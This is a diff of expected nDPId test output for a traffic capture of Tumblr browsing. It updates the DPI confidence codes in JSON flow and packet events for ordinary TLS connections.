+01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24429,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122095,"flow_last_seen":1605292122212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605292122212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24626,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1605292122439,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":203,"pkt_l4_len":149,"thread_ts_msec":1605292122439,"pkt":"qtsDr8lk5EKm5WPyht1gDKQRAJUGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFwAAAAAAACAK2QgBu\/13v3+ZlfzugBgB9aL3AAABAQgKG7m5ccLd3lMXAwMAcFVxaXihuhejZCNpZ5nuv6bEN9Yj5XMBxAt2QHwyRgmT6ybDwC5C73DyglYgxmIhMzt282zpUtE5GphT7ONBXskP6qssi1eNQHysgmBFeTvR+6kSeL0yhYhtFPIEYfWd8KPo3wOHIQIgFNXMNqMrZ9Q="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24626,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605292121674,"flow_last_seen":1605292122439,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1605292122439,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24626,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605292121674,"flow_last_seen":1605292122439,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1605292122439,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605292122501,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":149,"pkt_l4_len":95,"thread_ts_msec":1605292122501,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMAF8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MQoadXXNVgBgB9QaPAAABAQgKTYUvYcLdm\/0XAwMAOgAAAAAAAAAIvZM7k4G8cjK7Q9\/YrVI4eMbPvi74lWEwjtUtgcQJsZEKgX5x1KPe5+ARIWOSp6YRK8o="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605292104650,"flow_last_seen":1605292122501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":21,"midstream":1,"thread_ts_msec":1605292122501,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605292104650,"flow_last_seen":1605292122501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":21,"midstream":1,"thread_ts_msec":1605292122501,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24688,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122674,"flow_last_seen":1605292122674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122674,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24688,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1605292122674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122674,"pkt":"qtsDr8lk5EKm5WPyht1gD3A1ACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPwBuzwV9u8AAAAAoAL9IJXTAAACBAWgBAIIChNnJ60AAAAAAQMDBw=="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24691,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1605292122697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122697,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGAGB0kqAcsBIEmLB5kd7IUo3\/YpAbuY\/FghbGM8FfbwoBJXgNHxAAACBAV4AQMDAwQCCArC3eI6E2cnrQ=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24692,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1605292122698,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122698,"pkt":"qtsDr8lk5EKm5WPyht1gD3A1ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPwBuzwV9vBYIWxkgBAB+1XrAAABAQgKE2cnxcLd4jo="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24693,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122674,"flow_last_seen":1605292122698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1605292122698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24693,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122674,"flow_last_seen":1605292122698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1605292122698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24694,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122698,"flow_last_seen":1605292122698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24694,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1605292122698,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122698,"pkt":"qtsDr8lk5EKm5WPyht1gCuvGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoVprIBu3ASIMYXhL6qgBAB9S93AAABAQgKNSTnjcLdLMU="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24706,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1605292122741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122741,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAEpymhUqAcsBIEmLB5kd7IUo3\/YpAbumsheEvqpwEiDHgBALdyXtAAABAQgKwt3iZjUkMfM="} -00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24707,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122674,"flow_last_seen":1605292122755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1605292122755,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24707,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122674,"flow_last_seen":1605292122755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1605292122755,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24733,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122874,"flow_last_seen":1605292122874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122874,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24733,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1605292122874,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122874,"pkt":"qtsDr8lk5EKm5WPyht1gDJQ7ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnP4Bu4CgSN\/gvLosgBAB9qrlAAABAQgK1OQQnsLdMvM="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1605292122899,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122899,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuc\/uC8uiyAoEjggBALQrp6AAABAQgKwt3jAtThR68="} @@ -199,7 +199,7 @@ 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104013,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1605292102602,"flow_last_seen":1605292122470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":35234,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1605292102602,"flow_last_seen":1605292122470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":35234,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292114506,"flow_last_seen":1605292114736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292114506,"flow_last_seen":1605292114736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108796,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} @@ -212,7 +212,7 @@ 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102219,"flow_last_seen":1605292102653,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108796,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108796,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605292105433,"flow_last_seen":1605292106000,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7251,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"}} +00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605292105433,"flow_last_seen":1605292106000,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7251,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"}} 00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605292121674,"flow_last_seen":1605292122517,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102603,"flow_last_seen":1605292102678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102603,"flow_last_seen":1605292102678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -224,14 +224,14 @@ 00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49496,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 